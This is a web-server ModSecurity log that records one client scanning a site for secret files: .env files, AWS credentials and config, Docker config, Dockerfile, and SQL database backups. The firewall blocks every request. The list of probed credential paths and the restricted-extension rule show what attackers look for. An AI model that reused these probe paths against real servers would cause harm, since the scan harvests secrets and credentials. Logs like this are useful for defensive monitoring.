[Tue Dec 02 08:38:22.568343 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /src/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/src/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTQAAAAk"]
[Tue Dec 02 08:38:22.568564 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/src/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTQAAAAk"]
[Tue Dec 02 08:38:22.568784 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/src/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTQAAAAk"]
[Tue Dec 02 08:38:22.599700 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /includes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTgAAAAk"]
[Tue Dec 02 08:38:22.599919 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTgAAAAk"]
[Tue Dec 02 08:38:22.600124 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/includes/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTgAAAAk"]
[Tue Dec 02 08:38:22.631289 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /modules/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTwAAAAk"]
[Tue Dec 02 08:38:22.631521 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTwAAAAk"]
[Tue Dec 02 08:38:22.631734 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/modules/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjTwAAAAk"]
[Tue Dec 02 08:38:22.662847 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /plugins/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjUAAAAAk"]
[Tue Dec 02 08:38:22.663075 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjUAAAAAk"]
[Tue Dec 02 08:38:22.663292 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/plugins/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjUAAAAAk"]
[Tue Dec 02 08:38:22.694503 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /themes/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjUQAAAAk"]
[Tue Dec 02 08:38:22.694740 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjUQAAAAk"]
[Tue Dec 02 08:38:22.694947 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/themes/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjUQAAAAk"]
[Tue Dec 02 08:38:22.725990 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjUgAAAAk"]
[Tue Dec 02 08:38:22.726219 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjUgAAAAk"]
[Tue Dec 02 08:38:22.726448 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/.env"] [unique_id "aS6XbpvtKXnzGjDKyabjUgAAAAk"]
[Tue Dec 02 08:38:22.757538 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aS6XbpvtKXnzGjDKyabjUwAAAAk"]
[Tue Dec 02 08:38:22.757769 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aS6XbpvtKXnzGjDKyabjUwAAAAk"]
[Tue Dec 02 08:38:22.757988 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/credentials"] [unique_id "aS6XbpvtKXnzGjDKyabjUwAAAAk"]
[Tue Dec 02 08:38:22.788989 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Matched phrase ".aws/config" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/config found within REQUEST_FILENAME: /.aws/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aS6XbpvtKXnzGjDKyabjVAAAAAk"]
[Tue Dec 02 08:38:22.789211 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aS6XbpvtKXnzGjDKyabjVAAAAAk"]
[Tue Dec 02 08:38:22.789413 2025] [:error] [pid 468147] [client 18.133.245.137:47928] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.aws/config"] [unique_id "aS6XbpvtKXnzGjDKyabjVAAAAAk"]
[Tue Dec 02 08:38:23.812128 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Matched phrase "Dockerfile" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: Dockerfile found within REQUEST_FILENAME: /dockerfile"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aS6Xb50fE9xfoNXam56O-AAAAAU"]
[Tue Dec 02 08:38:23.812344 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aS6Xb50fE9xfoNXam56O-AAAAAU"]
[Tue Dec 02 08:38:23.812557 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/Dockerfile"] [unique_id "aS6Xb50fE9xfoNXam56O-AAAAAU"]
[Tue Dec 02 08:38:23.843496 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Matched phrase ".docker/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .docker/ found within REQUEST_FILENAME: /.docker/config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aS6Xb50fE9xfoNXam56O-QAAAAU"]
[Tue Dec 02 08:38:23.843758 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aS6Xb50fE9xfoNXam56O-QAAAAU"]
[Tue Dec 02 08:38:23.843986 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.docker/config.json"] [unique_id "aS6Xb50fE9xfoNXam56O-QAAAAU"]
[Tue Dec 02 08:38:24.067027 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAAAAAAU"]
[Tue Dec 02 08:38:24.067369 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAAAAAAU"]
[Tue Dec 02 08:38:24.067611 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/backup.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAAAAAAU"]
[Tue Dec 02 08:38:24.098150 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/db_backup.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAQAAAAU"]
[Tue Dec 02 08:38:24.098576 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/db_backup.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAQAAAAU"]
[Tue Dec 02 08:38:24.098844 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/db_backup.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAQAAAAU"]
[Tue Dec 02 08:38:24.129321 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".sql"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/database.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAgAAAAU"]
[Tue Dec 02 08:38:24.129686 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAgAAAAU"]
[Tue Dec 02 08:38:24.129887 2025] [:error] [pid 464291] [client 18.133.245.137:33310] [client 18.133.245.137] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database.sql"] [unique_id "aS6XcJ0fE9xfoNXam56PAgAAAAU"]
